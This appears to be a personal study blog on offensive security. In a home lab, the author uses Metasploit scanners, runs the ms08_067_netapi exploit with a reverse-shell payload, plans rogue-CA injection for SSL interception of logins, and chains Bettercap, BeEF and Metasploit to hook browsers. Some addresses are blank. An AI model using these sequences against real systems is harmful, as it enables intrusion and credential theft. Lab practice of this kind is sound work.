Frustrated with Inject_CA

Spent this morning trying to get the Inject_CA module to work properly (or at least properly as I see fit). It is successfully inserting the key in to the registry, and reports success, but the actual certificate isn’t showing up in the Certs MMC.  If I don’t see it there, then I have to assume it’s no actually loading properly. Nothing useful from Google so far.  Well persistence will hopefully pay off, because this one is too useful to pass up.

Messing Around in Metasploit

Over lunch break I’ve just been reading up on some general things you can do in Metasploit.  Been playing some misc. modules such as:

  • auxiliary/scanner/portscan/syn
  • auxiliary/scanner/portscan/tcp
  • auxiliary/scanner/smb/smb_version

I also learned about the IP Idle Scan technique. Very clever indeed. There’s a module for that too. scanner/ip/ipidseq



Injecting Certificates?

Tonight I’m messing around with post/windows/manage/inject_ca. Specifically trying to get it to work.  Seems like a handy little item to have for SSL based MITM attacks.  Create a root CA, use an exploit to add it to the root of a target, then lay low and wait for web logins.  Doubly useful for those HSTS secured sites…

I didn’t realize that certificates are just stored as binary blobs in the registry. Neat.

Also, XP SP3 just straight up doesn’t understand SHA512. At all. I had to apply a hotfix to get it up and running.


Mastering the Obvious

Today I learned the difference between true meterpreter and the reverse shell. Previously I had used meterpreter to get a shell. Didn’t know you could just have it give you one. Though I’ve found it somewhat inconvenient not having the full meterpreter suite available, so my preference is definitely the meterpreter vs the straight reverse shell.

windows/meterpreter/reverse_tcp == Standard Meterpreter
generic/shell_reverse_tcp == command prompt. Yes, duh, a shell.

Also found this nifty cheat sheet. (PDF warning)

Clubbing Baby Seals

So to get some practice I’ve built a lab of obscenely vulnerable Windows client machines.  While this doesn’t really represent any kind of real world situation it’s been a good place for me to play around and test things while actually seeing some results. Though it does kind of feel like clubbing a baby seal at times.

  • XP SP3 or unpatched 7.
  • Adobe Reader 8.0
  • Adobe Air
  • Adobe Flash
  • Chrome 22.0.1229.0
  • Firefox 17.0
  • Java JRE 7 update 2
  • Realplayer
  • Shockwave

The process goes like this. Install OS, join domain, install all the software, configure the profile, snapshot the VM, ready for use!

The first tests I’ve been doing have all been MITM based browser attacks, but today I felt like being a bit more direct.

I initially tried using exploit/windows/dcerpc/ms03_026_dcom.  The first run indicated the port wasn’t open. Which made sense because I never opened that port on the target. So I created a file share to “prime the pump”.  Still no dice.

Next up was exploit/windows/smb/ms08_067_netapi. This one worked, and I got a shell. I’m documenting the actual text below so I have it for later.

root@KALI:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST (target)
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST (Kali)
msf exploit(ms08_067_netapi) > exploit
meterpreter > (Success!)

I’ll probably mess around more later today.

MetaSploit, Bettercap, and BeEf

MetaSploit, Bettercap, and BeEf work well together. Below is the basic syntax I used in Kali. It assumes the default gateway is, the Kali host is, and the target is 192.168.100.

Start MetaSploit using msgrpc
msf >load msgrpc ServerHost= Pass=abc123

Start BeEF
root@KALI:~# cd /usr/share/beef-xss
root@KALI:~# ./beef

Copy the hook url from the resulting command output.
(Will look something like this:

Start bettercap with the arguments to point the target machine to BeEF.
root@KALI:~# bettercap -T -T –proxy-module injectjs –js-url

Open up the BeEF Admin URL by browsing to

Assuming a client is hooked, investigate the client to determine likely metasploit options.  Get metasploit. Use the “Create invisible iframe” command to spawn an invisible iframe to the URL of the metasploit exploit.

That’s it.


The Screen Command

So there are times where I only have a single SSH session but want to be able to monitor multiple running processes. For example, metasploit, beef, and bettercap work well together, but it’s nice to be able to concurrently watch the output of all of them.

So I discovered the screen command. It let’s me split up a single session into multiple smaller sessions.  While it seems really powerful, thus far I’m just using it to give me four sessions at once.

I eventually just memorized the key sequence to get four evenly divided sessions going.

[CTRL]+[a] – (Enter the command mode.)
[SHIFT]+[s] – (Split the window horizontally.)
[CTRL]+[a] – (Enter the command mode.)
[SHIFT]+[\] – (Split the window Vertically.)
[CTRL]+[a] – (Enter the command mode.)
[TAB] – (Move to the next window.)
[CTRL]+[c] – (Launch a shell in the current window.)
[CTRL]+[a] – (Enter the command mode.)
[TAB]- (Move to the next window.)
[CTRL]+[a] – (Enter the command mode.)
[CTRL]+[c] – (Launch a shell in the current window.)
[CTRL]+[a]  – (Enter the command mode.)
[SHIFT]+[\] – (Split the window Vertically.)


About Pyrrh1c

The entire purpose of this blog is to track the things I’m learning as I study offensive security. It will act as a reference point for the future.

It’s called Pyrrh1c in reference to the phrase “phyrrhic victory“. I always accomplish my objectives, even if the effort and cost is disproportionate to the goal. So since this study has already occupied a ridiculous amount of my time why not embrace the madness?